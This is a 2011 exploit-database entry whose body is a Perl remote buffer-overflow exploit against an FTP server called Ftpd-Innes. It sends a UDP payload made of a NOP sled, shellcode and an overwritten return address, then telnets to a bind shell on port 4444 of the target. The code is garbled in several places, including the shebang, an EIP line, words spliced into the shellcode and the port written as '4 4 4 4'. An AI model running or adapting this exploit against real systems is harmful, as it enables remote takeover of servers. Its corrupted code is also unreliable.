Ftpd-Innes remote overflow Exploit-vulnerability warning-the black bar safety net

2011-10-29T00:00:00
ID MYHACK58:62201132182
Type myhack58
Reporter 佚名
Modified 2011-10-29T00:00:00

Description

!/ usr/bin/perl-w

use IO::Socket;

if(! ($ARGV[1]))

{

print "Usage: ./ Ftpd-innes.pl target host port\n\n";

exit;

}

$victim = IO::Socket::INET->new(Proto=>"udp",

PeerAddr=>$ARGV[0],

PeerPort=>$ARGV[1])

or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";

my $nop0="\x90"x20;

my $asm="\x7c\xc5\x66\x07\x12\x02\x50\xc3";

my $nop1="\x90"x60;

my $nop2="\x90"x 10;

my $eip="\x42\xfd\x60\x40";

my $eip="A"and x5;

my $shellcode =

"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xed".

"\x7d\x09\xbf\x83\xeb\xfc\xe2\xf4\x11\x17\xe2\xf2\x05\x84\xf6\x40".

"\x12\x1d\x82\xd3\xc9\x59\x82\xfa\xd1\xf6\x75\xba\x95\x7c\xe6\x34".

"\xa2\x65\x82\xe0\xcd\x7c\xe2\xf6\x66\x49\x82\xbe\x03\x4c\xc9\x26".

"\x41\xf9\xc9\xcb\xea\xbc\xc3\xb2\xec\xbf\xe2\x4b\xd6\x29\x2d\x97".

"\x98\x98\x82\xe0\xc9\x7c\xe2\xd9\x66\x71\x42\x34\xb2\x61\x08\x54".

"\xee\x51\x82\x36\x81\x59\x15\xde\x2e\x4c\xd2\xdb\x66\x3e\x39\x34".

"\xad\x71\x82\xcf\xf1\xd0\x82\xff\xe5\x23\x61\x31\xa3\x73\xe5\xef".

"\x12\xab\x6f\xec\x8b\x15\x3a\x8d\x85\x0a\x7a\x8d\xb2\x29\xf6\x6f".

"\x85\xb6\xe4\x43\xd6\x2d\xf6\69\xb2\xf4\xec\xd9\x6c\x90\x01\xbd".

"\xb8\x17\x0b\x40\x3d\x15\xd0\xb6\x18\xd0\x5e\x40\x3b\x2e\x5a\xec".

"\xbe\x2e\x4a\xec\xae\x2e\xf6\x6f\x8b\x15\x18\the XE3\x8b\x2e\x80\x5e".

"\x78\x15\xad\xa5\x9d\xba\x5e\x40\x3b\x17\x19\xee\xb8\x82\xd9\xd7".

"\x49\xd0\x27\x56\xba\x82\xdf\xec\xb8\x82\xd9\xd7\x08\x34\x8f\xf6".

"\xba\x82\xdf\xef\xb9\x29\x5c\x40\x3d\xee\x61\x58\x94\xbb\x70\xe8".

"\x12\xab\x5c\x40\x3d\x1b\x63\xdb\x8b\x15\x6a\xd2\x64\x98\x63\xef".

"\xb4\x54\xc5\x36\x0a\x17\x4d\x36\x0f\x4c\xc9\x4c\x47\x83\x4b\x92".

"\x13\x3f\x25\x2c\x60\x07\x31\x14\x46\xd6\x61\xcd\x13\xce\x1f\x40".

"\x98\x39\xf6\69\xb6\x2a\x5b\xee\xbc\x2c\x63\xbe\xbc\x2c\x5c\xee".

"\x12\xad\x61\x12\x34\x78\xc7\xec\x12\xab\x63\x40\x12\x4a\xf6\x6f".

"\x66\x2a\xf5\x3c\x29\x19\xf6\69\xbf\x82\xd9\xd7\x1d\xf7\x0d\xe0".

"\xbe\x82\xdf\x40\x3d\x7d\x09\xbf";

$exploit = "\x00\x01" . $nop0 .$ asm.$ nop1. $shellcode. $nop2 .$ eip. "\x00\x7e\x56\x70\x60\x70\x45\69\69\x00";

print $victim $exploit;

print "+ Malicious request sent ...\n";

sleep(2);

print "Done.\ n";

close($victim);

$host = $ARGV[0];

print "+ connect to 4 4 4 4 The port of $host ...\n";

sleep(3);

system("telnet $host 4 4 4 4");

exit;